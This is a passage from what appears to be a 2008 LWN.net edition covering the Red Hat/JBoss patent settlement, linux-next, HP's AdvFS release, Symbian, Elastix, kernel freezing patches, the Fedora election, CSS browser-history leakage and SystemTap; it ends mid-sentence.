This very carefully-worded text leaves one very interesting question open:
what about users of the software who are not Red Hat
customers?  It would appear that developers are covered, presumably even as
they develop the program beyond the "predecessor version" shipped by Red
Hat.  It has been made abundantly clear that Red Hat's customers are
covered.  There is a lot of text in the press release and FAQ suggesting
that non-customer users should be protected too, but that is never said
explicitly.  An omission like that in a carefully-written, lawyer-vetted
document can speak loudly; one must wonder what is going on.

Another interesting question is this: what about all of the other projects
out there which are using object-relational glue layers?  One can only
assume that this set includes just about every object-oriented application
which is using a
relational database.  The language makes it pretty clear that this patent
has not been licensed for free software in general; it only applies to the
specific piece of JBoss which was under dispute.  The press release claims
that the settlement covers derivative works, leading one to imagine that
it would be possible incorporate some small function from JBoss into an entirely
unrelated project and get the patent license with it.  But there is no way
to know whether this interpretation matches the real settlement or not.

And therein lies the real problem at this time: the actual terms of the
settlement, and of the licenses and covenants, have not been published.
One presumes that will change at some point; your editor queried Red Hat on
when that might be, but did not receive an answer by the time this article
was written.  Without knowing what the actual agreement is, nobody can
really assume that they have received any protection at all.

One other claim from the FAQ merits attention:


	The settlement should encourage the open source community by
	providing broad protection as to the patents covered by the
	agreement. More generally, the settlement demonstrates Red Hat's
	commitment to standing up for the community against patent
	aggressors. We believe it will serve as a precedent that should
	discourage future similar cases.


All of this is somewhat debatable, and needs to be questioned.  As noted
above, the actual breadth of the protection obtained is yet to be
disclosed.  The more relevant question, though, is: did Red Hat really
"stand up for the community" in this case, and will it discourage these
cases in the future?  Your editor is not convinced of either.


The way to stand up against this patent aggressor would have been to
invalidate the patent and put an end to it forevermore.  A quick trip to
your editor's bookshelf turned up David Taylor's Business Engineering
With Object Technology, dated 1995, which discusses difficulty with
relational databases and impedance-matching layers.  Grady Booch's
Object Solutions (1996) says: "Thus, it is reasonable to
approach the design of a data-centric system by devising a thin
object-oriented layer on top of a more traditional relational database
technology."  Or look at Object-Oriented Modeling and Design
by Rumbaugh et. al. (1991), which has an entire chapter on mapping objects
into relational databases.


In other words, there can be no
shortage of prior art in this case; this is not an idea which was first
conceived in 1998.  But, rather than take this approach, Red Hat chose to
settle.  It is not said anywhere, but chances are good that some money
changed hands here, and, by accepting a license for this patent, Red Hat
has given it some legitimacy.  Other free software projects - those which
Red Hat does not ship - have apparently been left open to the same attack.
Is this really the way to "discourage future
similar cases"?

Of course, such criticism is easy to make from the sidelines; it's easy for
those of us not directly involved in the suit to claim
that Red Hat should have taken the higher-risk, higher-expense road and
fought this case to the end.  There is no doubt that such an approach would
be better for the community - assuming Red Hat prevailed - but Red Hat's
management must make its own choices about which battles it is to fight.
Given that it chose to settle, Red Hat clearly tried to do the right thing
by obtaining some sort of protection for the community beyond its customer
base.  Time will tell how well that will work out and whether it will serve
as a model for future settlements or not.

		A day in the life of linux-next


The merge window phase of the kernel development cycle is a hectic time.
Over a period of about two weeks, between 5,000 and 10,000
changesets find their way into the mainline git repository.  Simply
managing that many patches would be hard enough, but the job is made more
complicated by the fact that these changesets are not all independent of
each other.  The
first changes to be merged can change the code base in ways that cause
later patches to fail to apply.  So merge windows have traditionally
required maintainers to rework their queued patches to resolve 
conflicts which arise as other trees are merged.  Given the tight time constraints (patches which aren't ready
when the merge window closes generally sit out until the next cycle
starts), this integration process has been known to put a fair amount of
pressure on subsystem maintainers.


The other person feeling the stress was Andrew Morton; one of his many jobs
was to bash subsystem trees together in his -mm releases.  That took a lot
of his time and didn't really solve the problem in the end; much of the
work which shows up in -mm isn't necessarily intended for the next
development cycle.  The end result of all this is that each merge window
brought together large amounts of code which had never been integrated
before.


Back in February, the linux-next tree was announced as a way to help ease
some of these problems.  We are now nearing the end of the first full
development cycle to use linux-next, so it's worth taking a look to see how
it is working out.


The idea behind this tree is relatively simple.  Linux-next maintainer
Stephen Rothwell keeps a list
of trees  (maintained with git or quilt) which
are intended to be merged in the next development cycle.  As of this
writing, that list contains 95 trees, all full of patches aimed at 2.6.27.
Once a day, Stephen goes through the process of applying these trees to the
mainline, one at a time.  With each merge, he looks for merge conflicts and
build failures.  The original
plan for linux-next stated that trees causing conflicts or build
failures would simply be dropped.  In reality, so far, Stephen usually
takes the time to figure out the problem; he'll then fix up or drop an
individual patch to make everything fit again.

When this process is done, he releases the result as the linux-next tree
for the day.  Others then grab it and perform build testing on it; some
people even boot and run the daily linux-next releases.  All this results
in a steady stream of problem reports, small fixes, patches moving from one
tree to another, and so on - various bits of integration work required to
make all of the pieces fit together nicely.


There is an interesting sort of implicit hierarchy in the ordering of the
trees.  Subsystem trees which are merged early in the process are less
likely to run into conflicts than those which come later.  When two trees
do come into conflict, it's the owner of the later tree - the one which
actually shows the conflict - who feels the most pressure to fix things
up.  The history so far, though, shows that there has been very little in
the way of finger-pointing when conflicts arise, as they do almost every
day.  All of the developers understand that they are working on the same
kernel, and they share a common interest in solving problems. 


[PULL QUOTE: 
One aspect of
this whole system remains untested, though: the movement of patches from
linux-next into the mainline.
 END QUOTE]


So, thus far, linux-next appears to be functioning as intended.  It is
serving as an integration point for the next kernel and helping to get
many of the merging problems out of the way ahead of time.  One aspect of
this whole system remains untested, though: the movement of patches from
linux-next into the mainline.  As things stand now, there is no automatic
movement between the trees; instead, maintainers will send their pull
requests directly to Linus as always.  If Linus refuses to merge certain
trees, or if he merges them in an order different from their ordering in
linux-next, integration problems could return.  In the end, it seems like
linux-next will have to drive the final integration process more than is
anticipated now, but it will probably take a few development cycles to
figure out how to make it all work.


Meanwhile, anybody who is interested in 2.6.27 can, to a great extent, run
it now by grabbing linux-next.  This tree has clarified one aspect of the
development process: the 2-3 month "development cycle" run by Linus
is, in fact, just the tip of the kernel development iceberg.  It is the
final integration and stabilization stage.  Linux-next nearly doubles the
length of the visible development cycle by assembling the next kernel long
before Linus starts working on it.  And even linux-next only comes into
play toward the end of a patch's life.


In the past, Linus has pointedly worked to avoid overlapping the
development and stabilization phases of the development cycle.  There was
no development tree at all for almost a year while 2.4 was beaten into
reasonable shape.  This separation was maintained out of a simple fear that
an open development tree would distract developers from the more important
task of finding and fixing bugs in the current stable release.


That separation is a thing of the past now; there are literally dozens of
development trees which are open for business at all times.  That can only
be worrisome to those who are concerned about the quality of kernel
releases; why should developers concern themselves with 2.6.26 bugs when 2.6.27 is being
assembled and 2.6.28 is already on the radar?  Whether such concerns are
valid is likely to be a matter of ongoing debate.


Meanwhile, however, linux-next appears to have settled in as a long-term
feature of the kernel development landscape.  It is serving its purpose as
a place to find and resolve integration problems; it has also had the
effect of taking much of that integration work off of Andrew Morton's
shoulders.  And that, in turn, should free him to spend more time trying to
get developers to fix all those bugs.


(See the linux-next
wiki for more information on how to work with this tree).

		What's AdvFS good for?


On June 23, HP announced that
it was releasing the source for the "Tru64 
Advanced Filesystem" (or AdvFS) under version 2 of the GPL.  This is,
clearly, a large release of code from HP.  What is a bit less clear
is what the value of this release will be for Linux.  In the end, that
value is likely to be significant, but it will be probably realized in
relatively indirect and difficult-to-measure ways.


AdvFS was originally developed by Digital Equipment Corporation for its
version of Unix; HP picked it up when it acquired Compaq, which had
acquired DEC in 1998.  This filesystem offers a number of the usual
features.  It is intended to be a high-performance filesystem, naturally.
Extent-based block management and directory indexes are provided.
It does journaling for fast crash recovery.  There is an undelete feature.
AdvFS is also designed to work in clustered environments.


Much of the thought that went into AdvFS was concerned with avoiding the
need to take the system down.  There is a snapshot feature which
can be used to make consistent backups of running systems.  Defragmentation
can be done online.  There is a built-in volume management layer which
allows storage devices to be added to (or removed from) a running
filesystem; files can also be relocated across devices.  The internal
volume manager can perform striping of files across devices, but nothing
more advanced than that; AdvFS will happily work on top of a more capable
volume manager, though.


There are a few things which AdvFS does not have.  There is no checksumming
of data, and, thus, no ability to catch corruption.  Online filesystem
integrity checking does not appear to be supported.  The maximum filesystem
size (16TB) probably seemed infinite in the early 1990's, but it's starting
to look a little tight now.


In general, AdvFS looks like something which was a very nice filesystem 
ten or fifteen years ago, but it has little that is not either available in
Linux now, or 
in the works for the near future.  And AdvFS doesn't even work with Linux -
no porting effort has been made, and it's not clear that one will be made.
So is this release just another dump of code being abandoned by its
corporate owner?


One could make a first answer by saying that, even if this were true, it
would still be welcome.  If a company gives up on a piece of code, it's far
preferable to put it out for adoption under the GPL than to let it rot
until nobody can find it anymore.  But there may well be value in this
release.


Even if there is no point in trying to make it work under Linux, the AdvFS
code is the repository of more than a decade of experience of making a
high-end filesystem work in a commercial environment.  Your editor had
stopped working with DEC systems by the time AdvFS came out, but the word
he heard from others is that the early releases were, shall we say,
something that taught
administrators about the value of frequent backups.  But after a few major
releases, AdvFS had stabilized into a fast, solid, and reliable
filesystem.  The current code will embody all of the hard lessons that were
learned in the process of getting to that point.


Chris Mason, who is currently working on the Btrfs filesystem, puts it this way:


	The idea is that well established filesystems can teach us quite a
	lot about layout, and about the optimizations that were added in
	response to customer demand.  Having the code to these
	optimizations is very useful.


Having that code licensed under the GPL is especially useful: any code
which is useful in its current form can be pulled quickly into Linux.  And,
even when the code itself cannot be used, the ideas that it embodies can be
borrowed without fear.  And that is exactly
what HP was hoping to encourage with this release:


	In case its not clear, this is a GPLv2 technology release, not an
	actual port to Linux.  We're hoping that the code and documentation
	will be helpful in the development of new file systems for Linux
	that will provide similar capabilities, and perhaps used to make
	tweaks to existing file systems.


And that would appear to be likely to happen.  Over time, the best ideas
and experience from AdvFS should find their way into the filesystems
supported by Linux, even if AdvFS, itself, never becomes one of those
filesystems.  So HP has made a significant contribution to the kernel
development process, one which will probably never show up in the changeset
counts and other easily-obtained metrics.


(Those interested in learning more about AdvFS would be well advised to
grab the documentation tarball from the AdvFS sourceforge page.  The
"Hitchhiker's guide" is a good starting place, though, at 229 pages, it's
not for hitchhikers who prefer to travel light.)


		Debian Lenny and the Eee PC?


The ASUS Eee PC, a subnotebook computer, was first introduced at at
COMPUTEX Taipei 2007.  The first models came with a modified version of the
Xandros operating system.  Xandros
has roots in Debian, and strives to be easy-to-use for first time Linux
users and Windows-centric businesses.  The company has never been afraid of
using proprietary components to make that happen, which has made it less
popular with free software fans.

The little PCs, meanwhile, proved to be very popular.  According to Wikipedia, ASUS sold
over 300,000 units in 2007.  Microsoft must have felt left out, so the next
generation of the little notebooks were available with a modified version
of XP.  At the 2008 COMPUTEX DistroWatch noted
that "not all was well at the ASUS stand. As a visitor
interested in Linux, I was disappointed to find just one of the products on
display running the open source operating system. Even worse was the fact
that the entire area was plastered with advertisements displaying large
Windows and Microsoft logos. The only flyer available at the stand was a
Microsoft one entitled "It's better with Windows"."

Naturally, the free software community has been working on free Linux
variants to run on these small boxes.  The most notable projects are EeeDora, a Fedora based
variant and the DebianEeePC
project.

Now it seems the Debian effort may have a chance at becoming an official
OS for the 2009 Eee PC.  In a recent
post to the Debian-eeepc-devel
mailing list, Ben Armstrong says, "I just received an encouraging
note from Ellis Wang of Asus in Taiwan following up on Martin Michlmayr's
suggestions to Asus about how they could work more closely with the Debian
community.  Ellis has assigned Robert Huang the task of putting a working
relationship in place between Asus and Debian, with backup provided by five
other Asus employees."

It would be great if ASUS would make pre-installed Debian Eee PC models.
But even if they don't, free software enthusiasts can install their choice
of EeeDora or custom Debian for themselves.

		Symbian to be another open mobile platform


The already crowded open source mobile phone software market just got more
so as 
Nokia has announced plans to open
up the Symbian operating 
system.  Symbian currently has the biggest installed base of any mobile
OS, which makes this announcement somewhat more surprising—market leaders
generally do not radically change their successful methods.  What it means
for the various Linux mobile phone initiatives is unclear, but it certainly
shakes things up a bit. 


Nokia, along with many of the biggest players in the mobile phone market,
has formed the Symbian
Foundation to provide its members with the OS on a royalty-free basis.
Several other components are being donated to the foundation as well, to
create a complete
platform for mobile applications.  The plan is for all of the code to be
released using the Eclipse Public License over the next two years.


In order to own the code, Nokia is purchasing the 52% of Symbian Limited
that it does not currently own for more than $400 million. This will allow
Nokia to donate Symbian, along 
with its S60 smartphone platform, which runs atop Symbian, to the
foundation.  Sony Ericsson and 
Motorola will donate their UIQ user interface layer, while NTT DoCoMo will
donate its Mobile Oriented Application Platform (MOAP).


Nearly two dozen companies have come together to form the foundation,
including handset makers, mobile carriers, and chip manufacturers.
Interestingly,
there is substantial overlap between Symbian Foundation members and those
of the Open Handset
Alliance—the umbrella organization for Google's Android
effort—and the LiMo Foundation.
Whether this reflects impatience with the pace of Android/LiMo development or
just an
effort to hedge their bets remains to be seen.     


Membership in the foundation is open to all who are willing to pay the
$1500 annual membership fee.  That fee will allow the use of all of the
components that make up the Symbian platform on a royalty-free basis.
Any developers that wish to create software for the platform need not join
as there will be a developer program available at no charge.  The
foundation is expected to start operations in 2009. 


Opening up Symbian is seen as a reaction to Android and other free software
efforts in the mobile phone space.  One of the advantages touted for Linux
solutions is the zero cost—particularly the lack of per-unit
royalties.  By moving Symbian to this model, the foundation undercuts that
advantage.  Because Symbian is already a dominant player in the smartphone
market—with a large development community—there are some who
believe it will redirect efforts currently focused on Linux to Symbian.


That remains to be seen, of course, but Linux-based smartphones are still
in their infancy.  MontaVista's Mobilinux has been installed in more than
35 million mobile devices, mostly in Asian markets, but, perhaps because of
it being controlled by a single company, hasn't really generated a large
developer community.  It may also be targeting mobile carriers who are not
very interested in allowing users to customize their phones—at least
not to the extent Android and others envision.


There is a widening rift between the "free" and "locked down" camps for
mobile devices.  With this move, Nokia—and the other foundation
members—seem to be moving toward allowing 
users more freedom, though undoubtedly some handset makers and carriers
will opt for locking down their phones regardless of the openness of the
underlying OS.  One need look no further than the iPhone
for an example of a tightly controlled application environment that is, at
least so far, very popular with consumers.


In the long run, it is hard to imagine that mobile device users will be
willing to stick with the limited choices of applications provided by their
carrier or phone maker.  As more open alternatives become available, there
will be a pushback 
from handset buyers that will be harder for the carriers to resist.  For
many, their mobile phone is the most sophisticated computer they own and
the history of personal computers would indicate that a thriving ecosystem
of the third-party applications is an important part of the purchasing
decision.  That requires developers.


The current proliferation of open mobile phone software platforms is, in
many ways, a battle for developer mindshare.  LiMo, Android, and OpenMoko are all
Linux-based development platforms that support multiple hardware devices,
which should allow applications to run on many different mobile devices
with minimal porting.  How well that works in practice is still an open
question.  


For many of the established players in the mobile device market, Symbian is
a known quantity.  It has shipped on countless devices—its strengths and
weaknesses are well understood.  Turning it into a free software release
will allow, at least potentially, members to move the Symbian code in the
direction they want.
But will that stop, or substantially slow down, the
adoption of Linux-based solutions?

In order for that to happen, Symbian
itself will need some kind of developer community, something like what
currently exists for the kernel and user space applications on Linux.
Whether the opening of the code will be enough to attract that community is
an open question.  It may be that developers at the member companies will
be forced to form that community—something that could affect the bottom line. 


One of the key problems that the various Linux-based efforts face is that
of fragmentation.  The vendors of royalty-based mobile
platforms—primarily Microsoft and Palm—tend to point to the
multiple incompatible Linux efforts as proof.  They tout the control that a
single vendor provides to ensure compatibility.  Others, like Apple and RIM
(maker of Blackberry email phones), do not license their software to others
so they tightly control the hardware, which tends to avoid fragmentation.  


Within a particular initiative, fragmentation is likely to be a very bad
thing, but having multiple platform choices tends to provide healthy
competition and 
thus help consumers.  Over time, some of the current Linux-based platforms
may fall by the wayside to leave fewer choices, but that will likely
happen due to technical considerations, part of which will be determined by
the third-party application developers.


One questions remains though: what happens with Qt, or more specifically
the Qtopia
Phone Edition?  Nokia bought Trolltech early this year, at least
partially for their mobile toolkit.  Will they port it to Symbian and
donate it to the foundation?  They could, of course, port it but keep it
separate, but that would seem to lead down the path toward fragmentation.
It seems somewhat unlikely that they would
change Trolltech's successful hybrid of GPL and commercial licenses, but
before this announcement few thought that Symbian would be freed.  Nokia
has certainly adopted a more open-friendly stance of late—they
clearly see it as a way to generate more business—so it certainly is
not out of the realm of possibility.


While opening up Symbian may inhibit Linux adoption on mobile devices, it
can only be seen as a good thing for consumers and the free software
community as a whole.  In many ways, it validates the free software
development model 
along with the idea of freedom for users and developers.  The competition
between Linux and Symbian will also likely help both improve.  Expect lots
of interesting devices and applications in the next few years because of
it.


		The Elastix PBX system


Elastix is a Linux-based telephone
Private Branch eXchange
(PBX) telephony system that is built on the
CentOS Linux distribution.
Elastix uses the Asterisk
PBX software as its base and adds a number of extensions.
Elastix is being developed by
PaloSanto Solutions.

<!-- LWNPutAdHere -->

From the Elastix

User Manual [pdf]:


Elastix is an appliance software that integrates the best tools available for
Asterisk-based PBXs into a single, easy-to-use interface. It also adds its
own set of utilities and allows for the creation of third party modules to
make it the best software package available for open source telephony.
The goals of Elastix are reliability, modularity and ease-of-use. These
characteristics added to the strong reporting capabilities make it the best
choice for implementing an Asterisk-based PBX.


Some of the Elastix

features include:


A web-based user interface.
 A built-in help interface.
 Modular design for easy management of features.
 Support for multiple virtualized systems on one platform.
 Can present a variety of system status reports.
 A built-in voicemail system.
 Support for VoIP telephony.
 Support for faxes with fax to email conversion.
 Support for instant messaging.
 a built-in mail server.
 Support for video phones.
 A billing interface.
 Support for automatic outgoing telemarketing calls.
 Multi-language support.


The

screen shots show the Elastix user interface in action.


Stable version 1.1 of Elastix was recently

announced:


This new version contains updates to more than 130 packages. It also brings together the new "Agenda" module which allows you to access an integrated Calendar and Phone Book in a very user-friendly manner.
The calendar module allows a user to schedule events which can activate automatic phone call reminders.


In addition, version 1.1 brings a Phone Book interface which you should all be pretty familiar with. It lists people's names with their phone numbers. The interesting thing here is that you can click-to-call your contacts in the Phone Book.
And that is not all!
We have placed special emphasis on the end user. Starting with version 1.1 the end user may login to Elastix and find a "Dashboard" with quickly accessible information about personal emails, calendar, faxes, voicemails, etc.


An Elastix 1.1 CD image was

downloaded and burned onto a CDROM.  The CD was installed onto an
old 1.4 Ghz Athlon system with a 15GB hard drive.
To actually use the system, an Asterisk-compatible telephone interface
card should be installed on the host machine.
The system installed with
no problems, booted up and the login screen came up with a message
to access the system via the web on the DHCP-supplied LAN address.


The Elastix web interface was accessed from another local machine.
At this point, the documentation (still at version 0.9) fell short
due to a lack of information on the required username/password.
A little searching on Google revealed

the answer (admin/palosanto) from the online Elastix PBX Installation
instructions.


Once logged into the web interface, clicking through the many different
pages showed that the system appeared to be functioning normally.
An incredible array of capabilities exist in the system and
it looks to be fairly easy to master.
It was not possible to test any real telecom uses due to the lack of
a telephone interface card, however adding and configuring a card
can be done after the system has been installed.


If you have a need for a low cost PBX, or simply want an easy way
to play with Asterisk, Elastix is a good way to proceed.


		Freezing filesystems and containers


Freezing seems to be on the minds of some kernel hackers these days,
whether it is the northern summer or southern winter that is causing it is
unclear.  Two recent patches posted to linux-kernel look at freezing,
suspending essentially, two different pieces of the kernel: filesystems and
containers.   For containers, it is a step along the path to being able to
migrate running processes elsewhere, whereas for filesystems it will allow
backup systems to snapshot a consistent filesystem state.  Other than
conceptually, the patches have little to do with each other, but each is
fairly small and self-contained so a combined look seemed in order.


Takashi Sato proposes taking
an XFS-specific feature and moving it into the filesystem code.  The patch
would provide an ioctl() for suspending write access to a
filesystem, freezing, along with a thawing option to resume writes.  For
backups that snapshot the state of a filesystem or otherwise operate
directly on the block device, this can ensure that the filesystem is in a
consistent state.


Essentially the patch just exports the freeze_bdev() kernel
function in a user accessible way.  freeze_bdev() locks a file
system into a consistent state by flushing the superblock and syncing the
device.   The patch also adds tracking of the frozen
state to the struct block_device state field.  In its simplest
form, freezing or thawing a filesystem would be done as follows:

Where fd is a file descriptor of the mount point and the argument is ignored.


In another part of the patchset, Sato adds a timeout value as the argument
to the ioctl().  For XFS compatibility—though courtesy of a
patch by David Chinner, the XFS-specific ioctl() is
removed—a value of 1 for the pointer argument means that the timeout
is not set.  A value of 0 for the argument also means there is no timeout,
but any other value is treated as a pointer to a timeout value in seconds.
It would seem that removing the XFS-specific ioctl() would break
any applications that currently use it anyway, so keeping the compatibility
of the argument value 1 is somewhat dubious.


If the timeout occurs, the filesystem will be automatically thawed.  This
is to protect against some kind of problem with the backup system.  Another
ioctl() flag, FIFREEZE_RESET_TIMEOUT, has been added so
that an application can periodically reset its timeout while it is
working.  If it deadlocks, or otherwise fails to reset the timeout, the
filesystem will be thawed.  Another FIFREEZE_RESET_TIMEOUT after
that occurs will return EINVAL so that the application can
recognize that it has happened.


Moving on to containers, 
Matt Helsley posted a patch
which reuses 
the software suspend (swsusp) infrastructure to implement freezing of all
the processes in a control group (i.e. cgroup).
This could be used now to 
checkpoint and restart tasks, but eventually could be used to migrate tasks
elsewhere entirely 
for load balancing or other reasons.  Helsley's patch set is a forward port
of work originally done by Cedric Le Goater.


The first step is to make the freeze option, in the form of the
TIF_FREEZE flag, available to all architectures.  Once that is
done, moving two functions, refrigerator() and
freeze_task(), from the power management subsystem to the new
kernel/freezer.c file makes freezing tasks available even to
architectures that don't support power management.


As is usual for cgroups, controlling the freezing and thawing is done
through the 
cgroup filesystem.  Adding the freezer option when mounting will
allow access to each container's freezer.state file.  This can be
read to get the current freezer state or written to change it as follows:

It should be noted that it is possible for tasks in a cgroup to be busy
doing something that will not allow them to be frozen.  In that case, the
state would be FREEZING.  Freezing can then be retried by
writing 
FROZEN again, or canceled by writing RUNNING.  Moving the
offending tasks out of the cgroup will also allow the cgroup to be
frozen. If the 
state does reach FROZEN, the cgroup can be thawed by writing
RUNNING.


In order for swsusp and cgroups to share the refrigerator() it is
necessary to ensure that frozen cgroups do not get thawed when swsusp is
waking up the system after a suspend.  
The last patch in the set ensures that thaw_tasks() checks for a
frozen cgroup before thawing, skipping over any that it finds.


There has not been much in the way of discussion about the patches on
linux-kernel, but an ACK from Pavel Machek would seem to be a good sign.
Some comments by Paul Menage, who developed
cgroups, also indicate interest in seeing this feature merged.


		Notes on the Fedora board election


The Fedora Project recently held an election to fill four seats on its
governing board.  This is the first vote to happen since Red Hat decided to
let the community elect the majority of the board's members.  The results
of this vote surprised the Fedora community in a couple of ways, leading to
an extended discussion on how this community should be governing itself -
and whether it can do that at all.


In the end, Tom Callaway, Jesse Keating, and Seth Vidal were elected to the
board for two release cycles, and Jef Spaleta for one cycle.  The fifth
elected seat is currently held by Matt Domsch; three of the appointed seats
are currently held by Bill Nottingham, Karsten Wade, and Harald Hoyer.  Red
Hat has not yet announced who will be put into the fourth appointed seat.
The newly-elected members are all well-known Fedora contributors who have
done a lot for the project.  So why are there questions?  It comes down to
two points:


 Three of the four representatives elected to the board are employed 
     by Red Hat.  So, while Red Hat has given up its ability to directly
     appoint the majority of the board, that board will still be dominated
     by Red Hat employees.

 Of the 4069 Fedora community members who were entitled to vote in this
     election, only 250 actually turned in ballots.  A 6% turnout strikes
     many as being somewhat lower than one would expect from a
     fully-engaged community.


Though nobody said so directly, some people apparently suspected that Red
Hat employees voted in rather larger numbers than anybody else, and that
they duly elected some of their own to fill the board seats.  The truth of
the matter is probably not so simple; what we are seeing is a middle stage
in the Fedora Project's ongoing effort to become a more open,
community-oriented effort.

A few possible reasons for the low turnout were put forward.  One had to do
with how the election was conducted.  The self-nomination process evidently
does not sit well with some people, who would rather see candidates
nominated by their peers.  The range voting mechanism used by the project
seems complex and intimidating - though it still seems simple compared to
the Condorcet scheme employed by Debian.  There were also some complaints
that the election was not run in a sufficiently high-profile manner, to the
point that many community members might not have known that an election was
underway at all.

Greg DeKoenigsberg put forward a different
hypothesis to explain why so few people voted:


	IMHO, a properly functioning governance body *should* be so
	effective that no one cares much either way when it comes time to
	replace the membership.  From my perspective, low turnout means low
	dissatisfaction.  All other indicators seem to point to continued
	success for Fedora and its contributors...
	
	I myself almost didn't vote.  Why?  Because I liked the entire
	slate of candidates.


In this point of view, everybody is so happy that there's no need to get
involved in the process.  There is a contrary
point of view which is also worth considering, though:


	What I mean is that almost all Fedora related decisions come out of
	Red Hat anyway. The few +1 from community seats during FPB meetings
	don't matter, do they? They are just noise.


By this line of reasoning, instead of everybody being happy, the community
is in despair and sees no point in participating in a process which seems
unlikely to change anything.

The truth of the matter is almost certainly somewhere in between.  The
Fedora project has clearly opened considerably in recent years, to the
point that it is one of the most transparent and active distributions out
there.  The community contributes a lot of work and certainly participates
in discussions about the future of the project.  But Red Hat still holds
considerable sway; the fact that it employs a great number of Fedora
developers is, by itself, enough to ensure that.

Red Hat's large presence is also enough to explain the large number of Red
Hat employees elected to the board.  Those are the people who have the
luxury of working on Fedora full time; it is not surprising that they
tend to be the most prominent developers in the community.  Additionally,
there is a certain tendency for outsiders who become strong community
members to eventually become Red Hat employees as well.  Red Hat has been
increasing its investment in Fedora and
hiring a number of people to work on it; the fact that they would be
inclined to hire people who are already doing good work with Fedora should
not be surprising.

So when Fedora developers look at a ballot and think about the names found
there, chances are good that they will vote for the people they have seen
working hard and accomplishing things within the community.  And those
people, at this point, are likely to be Red Hat employees.  Until a time
comes when other companies find it worthwhile to pay full-time Fedora
developers, this situation is not likely to change much.

The free software community is full of examples of company-dominated
projects.  The bulk of these projects are subject to a high degree of
control by the sponsoring company.  That is natural; these companies have
specific needs which they expect their development projects to meet.
Making such projects truly open can be hard.  Red Hat has gone farther than
many in its efforts to make Fedora open, even if said efforts have come
later than some would like.  

Hopefully Red Hat will continue to follow that path, but, to a great
extent, the next steps have to be taken by others.  When the investment
into Fedora from outsiders exceeds Red Hat's investment, Red Hat will be
less of a dominant force.  Until then, efforts to increase the number of
people voting board elections - while being worthwhile and welcome - are
unlikely to significantly change the results of those elections.

		Leaking browser history


Browser history is fairly sensitive information for most people.  If there
were a way for random web sites to grab a list of other sites you have visited
recently, it would cause a fair amount of concern.  Unfortunately, a
longstanding problem in the HTML Document Object Model (DOM) makes for an
information leak nearly as bad as that.


The problem stems from the handy feature that browsers implement to show
you which links you have already visited.  The way that they show links in
a different color if you have visited them is by turning on the "visited"
style for the link.  Many sites, such as LWN, then change the default
colors for both visited and non-visited links via the site's Cascading Style
Sheet (CSS).  This information gets recorded in the DOM for the page
which can be queried from Javascript.


Because of the nature of the leak, scripts cannot get a full dump of the
browser's history, but they can get the visited status for a set of sites
they are interested in.  A web site that wishes to gather this kind of
information need only add a link to each site of interest—often in an
unreadable font size or color—and send over a 
bit of Javascript to read the DOM status for each link.


While this problem has been known since
at least 2002, there is no easy fix while still being compliant with the CSS
standard.  Because of that, most or all browsers are vulnerable.  It has
recently been in the news because it is being used in a
benign, or at least semi-benign, way.


These days many news sites and blogs have small images that correspond to
various social networking sites—digg, reddit and the like—that allow
voting on particular stories or postings.  Those images are buttons that
register a vote or submission of the site that displays them. With the proliferation of
these sites, a great deal of screen real estate was being taken up by these
icons, many of which were not useful because the person viewing them never
visited those particular sites.  


To reduce the clutter, Aza Raskin created some Javascript
code to determine which of the social networking sites a particular
user had visited so that only the icons for those sites were displayed.  Many
people would find that to be a useful hack, one that was fairly minimally
intrusive, which it is at some level.  Others, with a more strict personal
privacy desire, might find it more than a bit creepy.


Reducing clutter is one thing, but this technique can be used to gather
much more sensitive information than which of the many social networking
"news" sites you visit.  It is tempting to remind readers of the NoScript Firefox extension, but it has
become increasingly difficult to do nearly anything on the web without
enabling Javascript.  Many sites essentially hide their content behind a
Javascript test, refusing to display it unless Javascript is enabled.


This makes it difficult to avoid giving away some of your browsing history
to dodgy sites—or those with cross-site scripting
vulnerabilities—other than by avoiding them entirely.  It is an
unfortunate side effect of a useful property that, as the discussion on the
Mozilla bugzilla shows, will be difficult to completely eliminate.   It
should be noted that the links do not have to be obfuscated—by adding a
dash of 
Javascript LWN could know whether you have visited digg or reddit.  But, of
course, we don't force Javascript on our readers.


		More DTrace envy


Nearly a year ago, we looked at
the status of SystemTap in the context of Sun's much-hyped DTrace
tool.  Since that time there has been progress, but the basic problem
still remains: Linux does not have a good, ready-to-run answer to those wanting
the equivalent functionality of DTrace.  Due to an apparent
disconnect between the developers of SystemTap and the kernel hackers,
tracing for the Linux kernel—never mind user space programs—is
not up to the competition.


Both SystemTap and DTrace are tools
meant to help administrators track down 
performance and other problems on production systems by instrumenting the
kernel.  Because SystemTap has 
not matured to the point of easy usability, DTrace is often seen as a prime
differentiator between Linux and Solaris.  In a posting to
the ksummit-2008-discuss mailing list—where Kernel Summit
topics are considered—Matthew Wilcox brought
up the subject based on 
his experience at a 
recent PostgreSQL conference:

There was a lot of
buzz around DTrace.  Sun and a couple of other companies have put DTrace
hooks into postgres, so they now have some really useful canned queries.
If you're running Solaris or MacOS, of course.

So there was a lot of talk about switching away from Linux.  This can't
possibly be a good thing for us.  I don't personally know what the state
of our competing projects are, but clearly they haven't got their hooks
into postgres ... at least not upstream.


Typically Linux has been in the forefront of interesting new technologies
for free 
operating systems. When Sun opened up Solaris, though, a few features
jumped ahead of their Linux counterparts, in particular the ZFS filesystem
and DTrace.  SystemTap is supposed to provide the tracing functionality
while Btrfs
is the leading candidate for a "next generation" filesystem.  But, so far,
SystemTap has not lived up to its potential.


There are a few reasons for disappointment with SystemTap, some of which were pointed
out by James Bottomley:

When I go around end users, I find people in two camps:  The ones who've
drunk the sun coolaid and won't take anything on linux that isn't a
fully replicated dtrace (sort of like windows people who demand the
availability of outlook on linux) and people who are migrating to Linux
and trying to use systemtap for tracing.  These latter seem to have a
number of genuine concerns including latency, the time it takes to
actually go from command executing to functional trace, the inability to
trace user programs (dtrace can) and concerns about the amount of
perturbation the probes actually place inside the kernel.


Those are all valid concerns, but the biggest problem for users is that,
unless they are knowledgeable about kernel internals, it is difficult to know
how to use SystemTap.  A more simplified interface, one that
is less reliant on kernel internals, needs to be created; the way to do
that is through the placement of static trace points in the kernel and the
creation of "tapsets" to make them easily usable.  The SystemTap
developers think the kernel hackers are in the best position to do that work.
Ted Ts'o agrees
but sees some barriers:

The big thing that are missing are the tapsets
— the macro libraries that allow a system administrator to use it to
find and solve performance problems without being a kernel developer,
and more importantly, the documentation for said macro libraries so a
system administrator can actually use it.

[ ... ] the real problem isn't as much kernel
developers, it's that (a) it's too hard for many kernel developers to
use (and so many kernel developers are [not] using it), and (b) there aren't
enough tapsets.  The latter is something that kernel developers can
help solve, but unfortunately I'm not sure discussing it at the Kernel
Summit will necessarily lead to making forward progress.


If the kernel developers have trouble using SystemTap, they are unlikely to
